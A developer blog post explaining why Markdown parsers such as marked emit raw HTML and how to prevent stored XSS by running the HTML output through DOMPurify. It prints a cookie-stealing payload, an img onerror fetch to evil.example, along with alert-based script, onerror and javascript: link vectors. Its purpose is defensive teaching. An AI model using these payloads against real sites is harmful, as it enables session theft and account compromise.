Markdown Is Not Safe HTML: The Sanitization Step Everyone Skips
The Comment That Almost Shipped a Payload
A few years back I built a lightweight "developer notes" feature into an internal CMS: a textarea where teammates could leave Markdown-formatted comments on deploy logs. Markdown felt safe. It's just text with a little formatting, right? You type asterisks, you get bold. You type a link, you get a link. Nothing dangerous about that.
Then during code review a colleague pasted a comment to test formatting. It read, innocently enough, Looks good — see <img src=x onerror="fetch('https://evil.example/?c='+document.cookie)">. When the preview pane rendered it, his browser fired a network request carrying his session cookie to a domain none of us owned. He'd typed it as a joke to prove a point. It worked on the first try. We had a stored-XSS hole sitting in a tool that every engineer with production access used daily, and it had been live for three weeks.
What stung was that I thought I'd been careful. I was using a popular Markdown parser, the rendered output went straight into innerHTML, and at no point did I imagine the library was handing live HTML to the browser. That assumption — that a Markdown library sanitizes for you — is the single most common reason this bug exists in the wild. So let me walk through exactly why it happens, three ways an attacker exploits it, and the one-line fix that actually closes it (plus the order detail that breaks naive attempts).
Why CommonMark Hands You Live HTML On Purpose
Here is the part that surprises people: this is not a parser bug. It is the specification working as designed.
The CommonMark spec explicitly defines "raw HTML" as a valid inline and block construct. Section 6.6 ("Raw HTML") and section 4.6 ("HTML blocks") state that any text matching the HTML tag grammar is passed through to the output unchanged. The spec's reasoning is sound for its purpose: Markdown was born as a way to write HTML documents comfortably, so letting authors drop in raw <table> or <iframe> when Markdown's syntax falls short is a feature. Sanitization, the spec says outright, is the responsibility of the caller — not the parser.
That means every spec-compliant implementation behaves the same way. marked, markdown-it, and the reference commonmark.js all emit raw HTML by default for block-level markup. None of them is "vulnerable" — they are conformant. The vulnerability is introduced the moment you take their output and assign it to innerHTML without a sanitization pass in between.
If you want to see this happen without trusting my word, paste an attack string into the Markdown to HTML converter and look at the raw HTML output. The processing runs entirely in your browser, so it is safe to experiment with payloads there.
Three Vectors That Walk Straight Through
Let me make the threat concrete with the three inputs I now test against every Markdown-rendering surface I build.
import { marked } from 'marked';
// Vector 1: a raw <script> block
marked.parse('<script>alert(document.domain)</script>');
// → "<script>alert(document.domain)</script>\n"
// Vector 2: an event handler on an image that loads from a broken src
marked.parse('Hello <img src=x onerror=alert(1)>');
// → "<p>Hello <img src=x onerror=alert(1)></p>\n"
// Vector 3: a javascript: URI hidden inside ordinary link syntax
marked.parse('[click me](javascript:alert(document.cookie))');
// → '<p><a href="javascript:alert(document.cookie)">click me</a></p>\n'
All three produce live, executable HTML. Vector 2 is the nastiest in practice because it does not look like an attack to a human reviewer — onerror deliberately fires when src=x fails to load, so the image never even has to be valid. Vector 3 is sneaky for a different reason: in the Markdown source, [click me](javascript:...) is just bracket-and-paren text. It is not an href and carries no danger until the parser turns it into an <a> tag. Hold onto that fact — it dictates the correct fix.
A note on defaults, because they vary and the difference matters: markdown-it ships with html: false, so it escapes raw HTML blocks out of the box, and it additionally runs a validateLink check that rejects dangerous URI schemes. marked does neither — it emits raw HTML and has no built-in scheme blocking whatsoever. If your stack is marked, you own the entire sanitization burden yourself.
The Fix, And Why The Order Is Not Optional
The correct, battle-tested fix is to run the parser's HTML output through DOMPurify before it ever touches the DOM:
import { marked } from 'marked';
import DOMPurify from 'dompurify';
function renderMarkdown(input) {
const dirtyHtml = marked.parse(input); // step 1: Markdown → HTML
const cleanHtml = DOMPurify.sanitize(dirtyHtml); // step 2: strip dangerous HTML
return cleanHtml; // safe for innerHTML
}
renderMarkdown('Hello <img src=x onerror=alert(1)>');
// → 'Hello <img src="x">'
Run our three vectors through that and they collapse into harmless output. DOMPurify drops the onerror attribute entirely, rewrites javascript: hrefs into something inert, and strips <script> wholesale. The onerror image becomes a plain, dead <img src="x"> — the attribute that made it dangerous is simply gone.
Now the load-bearing detail: sanitize the HTML output, never the Markdown source. I have seen well-meaning code try to "clean" the raw Markdown string first — regex out <script>, blacklist the word javascript, and so on. It does not work, and Vector 3 explains why. In the source text [click me](javascript:alert(1)), there is no href and no tag for a sanitizer to recognize. The dangerous href="javascript:..." only comes into existence after marked.parse() constructs the anchor. A sanitizer pointed at the source is staring at the wrong artifact. Parse first, sanitize the resulting HTML second. The order is the whole game.
DOMPurify earns its trust here because it does not pattern-match strings; it parses the HTML into a real DOM tree and walks it node by node, removing elements and attributes that are not on its allowlist. That structural approach is why it survives the obfuscation tricks — mixed-case <ScRiPt>, null bytes, malformed nesting — that defeat every regex-based attempt.
The marked v8 Gotcha That Breaks Old Tutorials
If you are reading a Stack Overflow answer or a blog post from a few years ago, you will very likely see the advice marked.parse(input, { sanitize: true }) or a custom sanitizer callback. Stop — that code no longer runs as documented.
marked removed the sanitize and sanitizer options in version 8.0.0. They had been deprecated for a while precisely because a Markdown library reinventing an HTML sanitizer is a bad idea — that is a specialized, adversarial problem best left to a dedicated tool like DOMPurify. On a current marked, passing { sanitize: true } is silently ignored. The option does nothing. Code that relied on it isn't throwing an error to warn you; it is just quietly emitting unsanitized HTML while the developer believes the flag is protecting them. That false sense of security is arguably worse than no flag at all.
So the modern, correct mental model is a clean separation of concerns:
// WRONG — option removed in marked v8.0.0, silently does nothing:
const html = marked.parse(userInput, { sanitize: true });
// RIGHT — let marked do Markdown, let DOMPurify do security:
const html = DOMPurify.sanitize(marked.parse(userInput));
One library converts Markdown to HTML. A different, purpose-built library makes that HTML safe. Do not ask either one to do the other's job.
What I Changed After The Near-Miss
After that CMS incident, three rules went into my checklist permanently, and they have held up across every project since.
First, I treat any path from user input to innerHTML as hostile by default, regardless of how "trusted" the input source feels. Internal tools used only by colleagues are not safer — they are higher-value, because those sessions hold production credentials, exactly as my colleague's cookie demonstrated.
Second, I keep those three attack strings — the raw <script>, the onerror image, and the javascript: link — as a literal test fixture. If a rendering surface passes all three through unchanged, it ships unsanitized HTML, full stop. It is a ten-second check that I run by hand in the Markdown to HTML tool before wiring anything into a real DOM, and it has caught a regression more than once when someone refactored the render pipeline and dropped the sanitize call.
Third — and this is the subtle one — I verify the order in the actual code, not just the presence of a sanitizer. DOMPurify.sanitize(marked.parse(x)) is safe; marked.parse(DOMPurify.sanitize(x)) is not, because sanitizing the Markdown source leaves the javascript: link untouched to be parsed into a live href afterward. The two lines look almost identical in a diff. Only one of them is correct.
Markdown feels safe because, as a syntax, it is small and friendly. But the CommonMark spec was never trying to protect you — it was trying to faithfully produce HTML, and it does that job perfectly, dangerous tags and all. Safety is a second, separate step that lives entirely on your side of the line. Skip it and you are not running a Markdown renderer; you are running an open HTML injection endpoint with nicer syntax. The same principle applies anywhere you render untrusted structured input — it's exactly why processing things like JSON locally in your browser and treating every external string as adversarial is the only sane default.
Tools used in this guide
- Markdown to HTML Converter — Paste Markdown, preview the rendered result, and copy sanitized HTML for docs, CMS publishing, or prototypes.
- JSON Formatter — Paste JSON, validate it, format it with indentation, or minify it into compact output for APIs and config files.